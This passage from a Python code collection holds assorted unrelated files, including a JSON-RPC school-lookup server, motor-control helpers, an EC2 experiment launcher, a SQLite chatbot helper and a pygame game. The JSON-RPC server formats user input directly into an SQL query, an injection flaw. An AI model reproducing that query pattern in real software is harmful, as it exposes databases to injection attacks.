PositionListView.as_view(), name='list'),\n\turl(r'^create/$', PositionCreateView.as_view(), name='create'),\n\turl(r'^(?P[\\w-]+)/$', PositionUpdateView.as_view(), name='edit')\n]","sub_path":"src/positions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"576382876","text":"\"\"\"\n\n 13_json_rpc_server.py -\n\n This server uses JSON-RPC receive requests. A sample\n client can be found in 14_json_rpc_client.py.\n\n To run this, you should install two small dependencies:\n\n pip install Werkzeug\n\n pip install json-rpc.\n\n Run this first, then run 14_json_rpc_client.py\n\n\"\"\"\nimport sqlite3\nfrom collections import namedtuple\n\nfrom werkzeug.wrappers import Request, Response\nfrom werkzeug.serving import run_simple\n\nfrom jsonrpc import JSONRPCResponseManager, dispatcher\n\nSchool = namedtuple('School', 'name city state')\ndata_sourcefile = '../ch02_database/schools.db'\nSELECT_SCHOOLS_SQL = 'SELECT fullname, city, state FROM schools WHERE fullname like \"%{0}%\"'\n\n\n@dispatcher.add_method\ndef get_location(school_name):\n school_data = []\n connection = None\n\n try:\n connection = sqlite3.connect(data_sourcefile)\n print('here!')\n except sqlite3.Error as err:\n print('Error connecting to database: {0}'.format(err))\n return school_data\n\n connection.row_factory = sqlite3.Row # allows accessing cursor record by column name instead of index value\n cursor = connection.cursor()\n\n try:\n cursor.execute(SELECT_SCHOOLS_SQL.format(school_name))\n for sch in cursor.fetchall():\n school_data.append(School(*sch))\n except sqlite3.Error as e:\n print('Error processing request: {0}'.format(e))\n return school_data\n finally:\n if connection:\n connection.close()\n return school_data\n\n\n@Request.application\ndef application(request):\n response = JSONRPCResponseManager.handle(request.data, dispatcher)\n return Response(response.json, mimetype='application/json')\n\n\nrun_simple('localhost', 8005, application)\n","sub_path":"student_files/ch04_network_prog/13_json_rpc_server.py","file_name":"13_json_rpc_server.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"548409927","text":"weight = input('请输入体重(公斤): ')\nheight = input('请输入身高(公尺): ')\nweight = float(weight)\nheight = float(height)\nbmi = weight / (height * height)\nprint('您的BMI为:', bmi)\nif bmi < 18.5:\n print('您体重过轻')\nelif bmi >= 18.5 and bmi < 24:\n print('您的BMI正常')\nelif bmi >= 24 and bmi < 27:\n print('您体重过重')\nelif bmi >= 27 and bmi < 30:\n print('您是轻度肥胖')\nelif bmi >= 30 and bmi < 35:\n print('您是中度肥胖')\nelse:\n print('您是重度肥胖')","sub_path":"BMI.py","file_name":"BMI.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"345696898","text":"import os\n\nimport doodad as dd\nimport doodad.ec2 as ec2\nimport doodad.ssh as ssh\nimport doodad.mount as mount\nimport colored_traceback.always\nfrom doodad.utils import EXAMPLES_DIR, REPO_DIR\n\n# Local docker\nmode_docker = dd.mode.LocalDocker(\n image='thanard/pytorch:latest',\n)\n\n# or this! 
Run experiment via docker on another machine through SSH\nmode_ssh = None\n# mode_ssh = dd.mode.SSHDocker(\n# image='python:3.5',\n# credentials=ssh.SSHCredentials(hostname='my.machine.name', username='my_username', identity_file='~/.ssh/id_rsa'),\n# )\n\n# or use this!\n# mode_ec2 = None\nmode_ec2 = dd.mode.EC2AutoconfigDocker(\n image='thanard/pytorch:latest',\n region='us-east-1',\n zone='us-east-1b',\n instance_type='p2.xlarge',\n spot_price=1.0,\n s3_log_prefix='secret',\n gpu=True,\n terminate=False\n)\n\nMY_RUN_MODE = mode_ec2 # CHANGE THIS\n\n# Set up code and output directories\nOUTPUT_DIR = '/example/outputs' # this is the directory visible to the target\nmounts = [\n mount.MountLocal(local_dir=REPO_DIR, mount_point='/root/code/doodad', pythonpath=True), # Code\n # mount.MountLocal(local_dir='/home/thanard/Downloads/rllab/sandbox/thanard/infoGAN', pythonpath=True),\n mount.MountLocal(local_dir=os.path.join(EXAMPLES_DIR, 'secretlib'), pythonpath=True), # Code\n]\n\nif MY_RUN_MODE == mode_ec2:\n output_mount = mount.MountS3(s3_path='outputs', mount_point=OUTPUT_DIR, output=True) # use this for ec2\nelse:\n output_mount = mount.MountLocal(local_dir=os.path.join(EXAMPLES_DIR, 'tmp_output'),\n mount_point=OUTPUT_DIR, output=True)\nmounts.append(output_mount)\n\nprint(mounts)\n\nTHIS_FILE_DIR = os.path.realpath(os.path.dirname(__file__))\ndd.launch_python(\n target=os.path.join(THIS_FILE_DIR, 'app_main.py'),\n # point to a target script. If running remotely, this will be copied over\n mode=MY_RUN_MODE,\n mount_points=mounts,\n args={\n 'arg1': 50,\n 'arg2': 25,\n 'output_dir': OUTPUT_DIR,\n }\n)\n#\n# LOG_DIR = '/home/thanard/Downloads/rllab/data/test-ec2/'\n# THIS_FILE_DIR = '/home/thanard/Downloads/rllab/sandbox/thanard/infoGAN'\n# # DEMO_FILE= '/home/giulia/NIPS/softqlearning/softqlearning/environments/goals/ant_10_goals.pkl'\n# # ENV_FILE = '/home/giulia/NIPS/softqlearning/low_gear_ratio_ant.xml'\n# dd.launch_tools.launch_python(\n# target=os.path.join(THIS_FILE_DIR, 'infogan_2d.py'),\n# mode=MY_RUN_MODE,\n# mount_points=mounts,\n# args={\n# 'log_dir': OUTPUT_DIR,\n# # 'file_goals' : DEMO_FILE,\n# # 'file_env' : ENV_FILE,\n# 'save_file': OUTPUT_DIR,\n# },\n# verbose=True\n# )\n","sub_path":"examples/ec2_launch/ec2_launch_test.py","file_name":"ec2_launch_test.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"318917008","text":"import csv\nimport difflib\nimport pandas as pd\n#import files\n\nusers = []\nwith open('ntr_min.csv', 'rb') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in csvreader:\n users.append(row)\n\n#1001 companies\ntop_companies = []\nwith open('../fortune500.csv', 'rb') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in csvreader:\n top_companies.append(row[2])\n\n#819 schools\ntop_schools = []\nwith open('../best_schools.csv', 'rb') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in csvreader:\n top_schools.append(row[1])\n\n\n\n# company_bins = [0, 50, 200, 500, len(top_companies), len(top_companies)+1, len(top_companies)+2]\n# company_bin_labels = ['T1', 'T2', 'T3', 'T4', 'T5', 'NONE']\n# school_bins = [0, 50, 200, 500, len(top_schools), len(top_schools)+1, len(top_schools)+2]\n# school_bin_labels = ['T1', 'T2', 'T3', 'T4', 'T5', 'NONE']\n\n\n#functions\ndef formatCompany(company):\n if company == 'N/A':\n return len(top_companies)+2\n best = 
difflib.get_close_matches(company, top_companies)\n if len(best) == 0:\n return len(top_companies)+1\n else:\n return top_companies.index(best[0])\n\n# else if top_companies.index(best[0]))\ndef formatSchool(school):\n if school == 'N/A':\n return len(top_schools)+2\n best = difflib.get_close_matches(school, top_schools)\n if len(best) == 0:\n return len(top_schools)+1\n else:\n return top_schools.index(best[0])\n\ndef formatUser(user):\n return [formatSchool(user[0])] + [formatCompany(x) for x in user[1:4]]\n\n#test\n#users = users[:10]\nschools_lab = [x[0] for x in users]\ncompanies1_lab= [x[1] for x in users]\ncompanies2_lab= [x[2] for x in users]\ncompanies3_lab= [x[3] for x in users]\n\n\nformatted_users = [formatUser(x) for x in users]\nschools = [x[0] for x in formatted_users]\ncompanies1 = [x[1] for x in formatted_users]\ncompanies2 = [x[2] for x in formatted_users]\ncompanies3 = [x[3] for x in formatted_users]\n\n\nwith open('ntr_form.csv', 'w+') as csvout:\n csvwriter = csv.writer(csvout, delimiter=',', quotechar='\"')\n for row in formatted_users:\n csvwriter.writerow(row)\n csvout.flush()\n","sub_path":"data/users/indeed/bestFitter_ntr.py","file_name":"bestFitter_ntr.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"295703288","text":"import logging, os\n\nx = logging.getLogger(\"foo\")\n\nfh = logging.FileHandler(\"fh-logfile\")\nfh.setLevel(logging.INFO)\n\nch = logging.StreamHandler()\nch.setLevel(logging.ERROR)\n\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\nx.addHandler(fh)\nx.addHandler(ch)\n\nx.debug(\"Log one\")\nx.info(\"Log one\")\nx.warning(\"Log one\")\nx.error(\"Log one\")\n\n","sub_path":"logging/foo-logging.py","file_name":"foo-logging.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"469757808","text":"API_VERSION_PREFIX = \"/v0\"\nAUTH_HEADER_NAME = 'X-RH-IDENTITY'\nFACT_NAMESPACE = \"system_profile\"\nINVENTORY_SVC_HOSTS_ENDPOINT = '/r/insights/platform/inventory/api/v1/hosts/%s?per_page=%s'\nMAX_UUID_COUNT = 20\nMOCK_FACT_NAMESPACE = 'mockfacts'\nMOCK_FACTS_FILE = 'drift/mock_data/mockfacts.json'\nSYSTEM_ID_KEY = 'id'\n\nCOMPARISON_SAME = \"SAME\"\nCOMPARISON_DIFFERENT = \"DIFFERENT\"\nCOMPARISON_INCOMPLETE_DATA = \"INCOMPLETE_DATA\"\n","sub_path":"drift/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"615363967","text":"import maya.cmds as cmds\n\ndef select(i):\n button = cmds.button(l=\"sel\",w=25,h=20,c=lambda *args:cmds.select(i))\n \nsel = cmds.ls(sl=True)\n\nif len(sel)>0:\n if cmds.window('name',q=True,exists=True):\n cmds.deleteUI('name',window=True)\n my_window = cmds.window('name',t=\"Name\",w=100,h=500)\n my_scrollLayout = cmds.scrollLayout(horizontalScrollBarThickness=16,verticalScrollBarThickness=16)\n \n my_colLayout = cmds.columnLayout(adj=True)\n\n for i in sel:\n my_rowLayout = cmds.rowLayout(nc=2,p=my_colLayout)\n select(i)\n name = cmds.nameField(object=i,w=150)\n cmds.showWindow(my_window)\n","sub_path":"maya-mel_py_ui/python_tools/named_md.py","file_name":"named_md.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
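The bestFitter script a few records above ranks free-text company and school names against reference lists with difflib, falling back to sentinel indices when a name is missing or unmatched. A compact sketch of that lookup step, with a stand-in reference list:

import difflib

reference = ["Google", "Goldman Sachs", "General Motors"]  # stand-in list

def best_index(name, ref):
    # Index of the closest fuzzy match, or len(ref) + 1 as the "no match" sentinel,
    # mirroring the scheme in bestFitter_ntr.py.
    matches = difflib.get_close_matches(name, ref)
    return ref.index(matches[0]) if matches else len(ref) + 1

print(best_index("Googel", reference))  # -> 0 despite the typo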
+{"seq_id":"551495817","text":"from Jojo import *\r\n\r\nstand_masters = []\r\n\r\nstand_masters.append(Jojo(\"Jotaro\", \"190\", \"110\", date(1970, 3, 5), \"Star Platinum\", \"OraOra\"))\r\n\r\nwhile True:\r\n    command = input(\"Write command \\r\\n\")\r\n\r\n    if command == \"add\":\r\n        new_stand_master = Jojo()\r\n        new_stand_master.add()\r\n        stand_masters.append(new_stand_master)\r\n\r\n    elif command == \"show\":\r\n        for stand_master in stand_masters:\r\n            print(stand_master.show())\r\n\r\n    elif command == \"show_stand\":\r\n        for stand in stand_masters:\r\n            print(stand.show_stand())\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"146831607","text":"f = open(\"ipl\", \"r\")\n# no,team,matches,win,loss,pts\nipldict = {}\n\nfor lines in f:\n    ipl = lines.rstrip(\"\\n\").split(\",\")\n\n    no = ipl[0]\n    team = ipl[1]\n    matches = ipl[2]\n    win = ipl[3]\n    loss = ipl[4]\n    pts = ipl[5]\n\n    if no not in ipldict:\n        ipldict[no] = {\"no\": no, \"team\": team, \"matches\": matches, \"win\": win, \"loss\": loss, \"pts\": pts}\nf.close()\n\nfor key, value in ipldict.items():\n    print(key, \"->\", value)\n\n\ndef printDetails(**arg):\n    num = arg[\"no\"]\n    prop = arg[\"prop\"]\n    print(ipldict[num][\"team\"])\n    print(ipldict[num][prop])\n","sub_path":"LuminarProject/corepythonexam/iplpgm.py","file_name":"iplpgm.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"193308080","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 17 12:07:33 2019\n\n@author: Ben Boys\n\nFile name: \"motor_control.py\"\nDescription: Provide interface functions for controlling Dynamixel AX-12A motors.\nUse interface functions provided by DynamixelSDK\nAbbreviations: comm    communication\n               ax      AX-12A\n\n\"\"\"\n\n## Initiate global variables\n\n## Perhaps create a dictionary for all the attributes of a specific motor\n# import modules\nimport os # for key presses, reading and writing\nfrom packet_handler import PacketHandler\nfrom port_handler import PortHandler\nimport AX_constants as AX\n\n# Initialize PortHandler instance\n# Set the port path\nportHandler = PortHandler(AX.DEVICE_PORT)\n\n# Initialize PacketHandler instance\n# Set the protocol version\npacketHandler = PacketHandler(AX.DEVICE_PROTOCOL)\n\ndef getch():\n    \"\"\"Arguments:\n    Return: ch\n    Description: commands to get key presses\n    \"\"\"\n    if os.name == 'nt':\n        import msvcrt\n        return msvcrt.getch().decode()\n    else:\n        import sys, tty, termios\n        fd = sys.stdin.fileno()\n        old_settings = termios.tcgetattr(fd)\n        try:\n            tty.setraw(sys.stdin.fileno())\n            ch = sys.stdin.read(1)\n        finally:\n            termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n        return ch\n\n\ndef openPort():\n    \"\"\"\n    Arguments:\n    Return: None (terminates the program on failure)\n    Description:\n        Initialize the serial port for communication with the motor;\n        waits for a key press and quits if the port or baudrate cannot be set\n    \"\"\"\n    # Open port\n    if portHandler.openPort():\n        print(\"Succeeded to open the port\")\n    else:\n        print(\"Failed to open the port\")\n        print(\"Press any key to terminate...\")\n        getch()\n        quit()\n    # Set port baudrate\n    if portHandler.setBaudRate(AX.DEVICE_BAUDRATE):\n        print(\"Succeeded to change the baudrate\")\n    else:\n        print(\"Failed to change the baudrate\")\n        print(\"Press any key to terminate...\")\n        getch()\n        quit()\n\n    return None\n\ndef closePort():\n    \"\"\"Arguments:\n    
Return:\n Description: Close the serial port.\"\"\"\n # Close port\n portHandler.closePort()\n \n return None\n \ndef ping(ax_id):\n \"\"\"Arguments: Motor ID\n Return: True if successful, False if not successfull\n Description: Try to ping the Dynamixel \"\"\"\n dxl_model_number, dxl_comm_result, dxl_error = packetHandler.ping(portHandler, ax_id)\n if dxl_comm_result != AX.COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n return False\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n return False\n else:\n print(\"[ID:%03d] ping Succeeded. Dynamixel model number : %d\" % (ax_id, dxl_model_number))\n return True\n\ndef enableTorque(ax_id):\n \"\"\"Arguments: Motor ID\n Return: True if successful, False if not successful.\n Description: Enable torque, this will make the motor stiff, and able to provide torque.\"\"\"\n # Enable Dynamixel Torque\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, ax_id, AX.ADDR_TORQUE_ENABLE, AX.TORQUE_ENABLE)\n if dxl_comm_result != AX.COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n return False\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n return False\n else:\n print(\"Dynamixel has been successfully connected\") \n \n return True\n\ndef disableTorque(ax_id):\n \"\"\"Arguments: Motor ID\n Return: True if successful, False if not successul\n Description: Disable torque.\"\"\"\n # Disable Dynamixel Torque\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, ax_id, AX.ADDR_TORQUE_ENABLE, AX.TORQUE_DISABLE)\n if dxl_comm_result != AX.COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n \ndef writePosition(ax_id, degrees, fractional_speed):\n \"\"\"Arguments: Motor ID. 
Goal position in degrees.\n    Return:\n    Description: Set the goal position for the motor specified.\n    \"\"\"\n    motor_degrees = 150 - degrees\n    position_float = motor_degrees / 300.0 * 1023.0\n    position = round(position_float)\n\n    speed_float = fractional_speed * 1023.0\n    speed = round(speed_float)\n\n    # Write goal position; report any communication or packet error\n    dxl_comm_result, dxl_error = packetHandler.write4ByteTxRx(portHandler, ax_id, AX.ADDR_GOAL_POSITION, position, speed)\n    if dxl_comm_result != AX.COMM_SUCCESS:\n        print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n    elif dxl_error != 0:\n        print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n    return position\n\n\ndef readPosition(ax_id):\n    # Read present position\n    dxl_present_position, dxl_comm_result, dxl_error = packetHandler.read4ByteTxRx(portHandler, ax_id, AX.ADDR_PRESENT_POSITION)\n    if dxl_comm_result != AX.COMM_SUCCESS:\n        print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n    elif dxl_error != 0:\n        print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\n    print(\"[ID:%03d]  PresPos:%03d\" % (ax_id, dxl_present_position))\n    return dxl_present_position\n\n# =============================================================================\n# BASIC FUNCTIONS\n# =============================================================================\n# =============================================================================\n# I have written functions for:\n# open_port() DONE\n# close_port() DONE\n# check_error() I have instead written a ping function, sufficient for now?\n# bool_enable_torque() DONE\n# disable_torque() DONE\n# write_position() DONE\n# write_speed() IN-PROGRESS - NOT WORKING\n#\n# joints_degrees IN PROGRESS - this is a list of planned next-move motor positions, a data structure\n#\n# TODO: CONVERT DXL_MOVING_STATUS_THRESHOLD to a DEGREES value\n# TODO: CHECK THAT writePosition is ROBUST, and it is OKAY to perform this function and return a value to be used as a variable. 
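A worked pass through the writePosition conversion above, since the register arithmetic is easy to get backwards (AX servos map 0 to 300 degrees onto register values 0 to 1023, with the input angle measured from the 150-degree midpoint):

degrees = 45
position = round((150 - degrees) / 300.0 * 1023.0)  # (105 / 300) * 1023 = 358.05 -> 358
speed = round(0.25 * 1023.0)                        # quarter speed -> 256

# Which leaves the TODO above: is it actually safe to rely on writePosition's return value?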
I suspect not.\n# =============================================================================\n","sub_path":"tests/motor_control.py","file_name":"motor_control.py","file_ext":"py","file_size_in_byte":6353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"570747243","text":"class Global:\n objects = []\n INDEX = 0\n\n # def __init__(self):\n # Global.objects +=\n\n def increment(self):\n self.INDEX += 1\n\n @staticmethod\n def show_message():\n print('CLASS STATIC METHOD')\n\n # @staticmethod\n # def convert_string(value: str):\n # return value.upper()\n\n @classmethod\n def increments(cls):\n cls.INDEX += 1\n\n\na = Global()\na.increment()\nprint(a.INDEX)\n\nb = Global()\nprint(b.INDEX)\n\nb.show_message()\nGlobal.show_message()\n\nGlobal.increments()\nb.increments()\nprint(b.INDEX)\n","sub_path":"lesson07/staticclasses.py","file_name":"staticclasses.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"494859284","text":"import os\r\nfrom PIL import Image\r\n\r\n#get the directory name\r\ndirname = raw_input('directory:\\t')\r\n#get the list of jpg file names\r\npicNames = []\r\nfor file in os.listdir(r'{0}'.format(dirname)):\r\n\tif (\"_sm\" not in file):\r\n\t\tif (file.endswith(\".JPG\")) or (file.endswith(\".jpg\")):\r\n\t\t\tfileName = file.split(\".\")\r\n\t\t\tpicNames.append(fileName[0])\r\ni = 0\t\r\n#iterate for each jpg file in the folder\r\nwhile i < len(picNames):\r\n\timg = Image.open(\"./\" + dirname + \"/\" + picNames[i] + \".JPG\")\r\n\tnew_width = 500\r\n\tnew_height = 250\r\n\timg = img.resize((new_width, new_height), Image.ANTIALIAS)\r\n\timg.save(\"./\" + dirname + \"/\" + picNames[i] + \"_sm.JPG\")\r\n\timg.close()\r\n\ti = i + 1","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"319559439","text":"import sqlite3\n\n\nclass DBHelper:\n\n def __init__(self, dbname=\"servicebot.sqlite\"):\n self.dbname = dbname\n self.conn = sqlite3.connect(dbname)\n\n def setup(self):\n tblstmt = \"CREATE TABLE IF NOT EXISTS items (description text, owner text)\"\n tblstmt2 = \"CREATE TABLE IF NOT EXISTS cases (ticket_no number, log_date text, owner text, subject text, detail text,assignee text, department text, owner_fname text, owner_lname text, owner_phn text, owner_email text, owner_loc text, priority number)\"\n itemidx = \"CREATE INDEX IF NOT EXISTS itemIndex ON items (description ASC)\" \n ownidx = \"CREATE INDEX IF NOT EXISTS ownIndex ON items (owner ASC)\"\n self.conn.execute(tblstmt)\n self.conn.execute(tblstmt2)\n self.conn.execute(itemidx)\n self.conn.execute(ownidx)\n self.conn.commit()\n\n def add_item(self, item_text, owner):\n stmt = \"INSERT INTO items (description, owner) VALUES (?, ?)\"\n args = (item_text, owner)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def delete_item(self, item_text, owner):\n stmt = \"DELETE FROM items WHERE description = (?) 
AND owner = (?)\"\n args = (item_text, owner )\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def get_items(self, owner):\n stmt = \"SELECT description FROM items WHERE owner = (?)\"\n args = (owner,)\n return [x[0] for x in self.conn.execute(stmt, args)]\n\n def delete_chat(self,owner):\n #stmt = \"UPDATE items SET description = '' WHERE owner = (?)\"\n stmt = \"DELETE FROM items WHERE owner = (?)\"\n args = (owner,)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def delete_case(self,ticket_no):\n #stmt = \"UPDATE items SET description = '' WHERE owner = (?)\"\n stmt = \"DELETE FROM cases WHERE ticket_no = (?)\"\n args = (ticket_no,)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def add_case_subject(self,ticket_no, text, chat, firstName, lastName, date_today):\n stmt = \"INSERT into cases (ticket_no,log_date, owner, subject, owner_fname, owner_lname) values (?,?,?,?,?,?)\"\n args = (ticket_no,date_today,chat,text,firstName,lastName)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def get_case_subject(self,ticket_no ,chat, date_today):\n stmt = \"select * from cases where log_date = (?) and owner = (?) and ticket_no = (?)\"\n args = (date_today,chat,ticket_no)\n result = [x for x in self.conn.execute(stmt, args)]\n #print(result)\n return result\n\n def get_case_department(self,ticket_no ,chat):\n stmt = \"select department from cases where owner = (?) and ticket_no = (?)\"\n args = (chat,ticket_no)\n result = [x for x in self.conn.execute(stmt, args)]\n #print(result)\n return result[0]\n\n def delete_invalid_cases(self,chat):\n stmt = \"delete from cases where (subject is NULL or (owner_phn is null and owner_loc is null)) and owner = (?)\"\n args = (chat,)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def update_case_detail(self,text, chat, date_today,ticket_no,department):\n stmt = \"update cases set detail = (?),department = (?) where owner = (?) and log_date = (?) and ticket_no = (?)\"\n args = (text,department,chat,date_today,ticket_no)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def update_case_phn_loc(self,phn,loc, chat, date_today,assignee,ticket_no):\n stmt = \"update cases set owner_phn = (?), owner_loc = (?), assignee = (?) where owner = (?) and log_date = (?) and ticket_no = (?)\"\n args = (phn,loc,assignee,chat,date_today,ticket_no)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def get_pending_case(self,chat):\n stmt = \"select * from cases where owner = (?)\"\n args = (chat,)\n result = [x for x in self.conn.execute(stmt, args)]\n #print(result)\n return result\n\n def update_priority(self,chat,priority,ticket_no):\n stmt = \"update cases set priority = (?) where owner = (?) 
and ticket_no = (?)\"\n args = (priority,chat,ticket_no)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n\n\n\n\n","sub_path":"dphelperSqllite.py","file_name":"dphelperSqllite.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"23443324","text":"#!/usr/bin/env python\nfrom __future__ import division\n\nimport math\nimport torch, torch.nn as nn\nfrom torch.autograd import Variable\n\nclass PositionalEmbeddings(nn.Module):\n\n def __init__(self, d_model, dropout_rate, max_seq_len=1024):\n super(PositionalEmbeddings, self).__init__()\n self.dropout = nn.Dropout(dropout_rate)\n\n pe = torch.zeros(max_seq_len, d_model)\n for pos in range(max_seq_len):\n for i in range(0, d_model, 2):\n pe[pos, i] = math.sin(pos / (10000 ** (2 * i / d_model)))\n # use the same frequency for the cos of each sin/cos pair\n pe[pos, i+1] = math.cos(pos / (10000 ** (2 * i / d_model)))\n pe = pe.unsqueeze(0)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + Variable(self.pe[:, :x.shape[1]], requires_grad=False)\n return self.dropout(x)\n","sub_path":"models/nn/positional_embeddings.py","file_name":"positional_embeddings.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"363348279","text":"import pygame\nfrom random import randint\nimport time\nimport sys\nimport re\n\n\nwith open('records_new.txt', 'r') as file:\n tr = file.read()\n tr = re.split(r'\\n', tr)\n d = open('records.txt', 'w')\n for o in range(5):\n d.write(f'{tr[o]}\\n')\n d.close()\n\nUSERNAME = 'Player'\n\nsize = width, height = 1920, 1080\nscore = 0\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nGREEN = (0, 255, 0)\nMAGENTA = (255, 0, 255)\nCYAN = (0, 255, 255)\nBLACK = (0, 0, 0)\nCOLORS = [RED, BLUE, YELLOW, GREEN, MAGENTA, CYAN]\n\nglobal r1, r2, r3, r4, r5, r6\nglobal circle1_x, circle2_x, circle3_x, circle4_x, circle5_x\nglobal circle1_y, circle2_y, circle3_y, circle4_y, circle5_y\n\n\ndef main():\n pygame.init()\n\n game_over = False\n\n global score, r1, r2, r3, r4, r5, r6\n global circle1_x, circle2_x, circle3_x, circle4_x, circle5_x\n global circle1_y, circle2_y, circle3_y, circle4_y, circle5_y\n\n screen = pygame.display.set_mode(size)\n\n # Set up the circles' parameters\n r1 = randint(30, 60)\n circle1_x = randint(r1, width-r1)\n circle1_y = randint(r1, height-r1)\n a1 = randint(1, 5)\n b1 = randint(1, 5)\n r2 = randint(30, 60)\n circle2_x = randint(r2, width-r2)\n circle2_y = randint(r2, height-r2)\n a2 = randint(1, 5)\n b2 = randint(1, 5)\n r3 = randint(30, 60)\n circle3_x = randint(r3, width-r3)\n circle3_y = randint(r3, height-r3)\n a3 = randint(1, 5)\n b3 = randint(1, 5)\n r4 = randint(30, 60)\n circle4_x = randint(r4, width-r4)\n circle4_y = randint(r4, height-r4)\n a4 = randint(1, 5)\n b4 = randint(1, 5)\n\n # The next object is an ellipse, smaller but faster\n r5 = randint(10, 20)\n r6 = randint(20, 40)\n circle5_x = randint(r5, width-r5)\n circle5_y = randint(r5, height-r5)\n a5 = randint(10, 15)\n b5 = randint(10, 15)\n\n # Set the velocity vector\n dx = 1\n dy = 1\n while not game_over:\n # Handle quit and click events in a single loop: a second\n # pygame.event.get() later in the frame would miss clicks\n # already consumed by this one\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n elif event.type == pygame.MOUSEBUTTONDOWN:\n click(event)\n screen.fill(BLACK)\n circle1_x += a1 * dx\n circle1_y += b1 * dy\n circle2_x -= a2 * dx\n circle2_y -= b2 * dy\n circle3_x += a3 * dx\n circle3_y -= b3 * dy\n circle4_x -= a4 * dx\n circle4_y += b4 * dy\n circle5_x += a5 * dx\n circle5_y += b5 * dy\n\n # Reverse the velocity components on collision with a wall\n if circle1_y > height-r1 or circle1_y < r1:\n b1 *= -1\n if circle1_x > width - r1 or circle1_x < r1:\n a1 *= -1\n if circle2_y > height-r2 or circle2_y < r2:\n b2 *= -1\n if circle2_x > width - r2 or circle2_x < r2:\n a2 *= -1\n if circle3_y > height-r3 or circle3_y < r3:\n b3 *= -1\n if circle3_x > width - r3 or circle3_x < r3:\n a3 *= -1\n if circle4_y > height-r4 or circle4_y < r4:\n b4 *= -1\n if circle4_x > width - r4 or circle4_x < r4:\n a4 *= -1\n if circle5_y > height - r6 or circle5_y < r6:\n b5 *= -1\n if circle5_x > width - r5 or circle5_x < r5:\n a5 *= -1\n\n pygame.draw.circle(screen, COLORS[1], (circle1_x, circle1_y), r1)\n pygame.draw.circle(screen, COLORS[2], (circle2_x, circle2_y), r2)\n pygame.draw.circle(screen, COLORS[3], (circle3_x, circle3_y), r3)\n pygame.draw.circle(screen, COLORS[4], (circle4_x, circle4_y), r4)\n pygame.draw.ellipse(screen, COLORS[5], (circle5_x, circle5_y, r5, r6))\n pygame.display.flip()\n pygame.time.wait(10)\n\n# Build the leaderboard\n if (time.time() - start_time) >= 5:\n with open(\"records.txt\", \"r\") as file:\n get = file.read()\n get_2 = re.split(r'\\n', get)\n get_1 = re.findall(r'\\d{1,3}', get)\n print(get_1)\n for i in 